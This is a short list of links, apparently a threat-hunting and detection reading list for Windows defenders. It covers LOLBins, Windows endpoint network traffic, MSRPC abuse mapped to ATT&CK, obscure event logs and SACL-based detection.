Windows Use Cases
Living Off The Land Binaries and Scripts.
https://lolbas-project.github.io/
and why hunting for LOLBINS is so useful
https://nasbench.medium.com/why-hunting-for-lolbins-is-one-of-the-best-bets-e5e58e1619c2
The URL's a Windows endpoint talks to and why
https://learn.microsoft.com/en-gb/windows/privacy/manage-windows-11-endpoints
https://learn.microsoft.com/en-gb/windows/privacy/manage-windows-21h2-endpoints
The abuse of MSRPC mapped to Mitre ATT&CK
https://github.com/jsecurity101/MSRPC-to-ATTACK
Finding Forensic Goodness In Obscure Windows Event Logs
https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3
Windows API calls commonly used by malware
Detecting Windows Endpoint Compromise with System Access Control Lists.
https://medium.com/@cryps1s/detecting-windows-endpoint-compromise-with-sacls-cd748e10950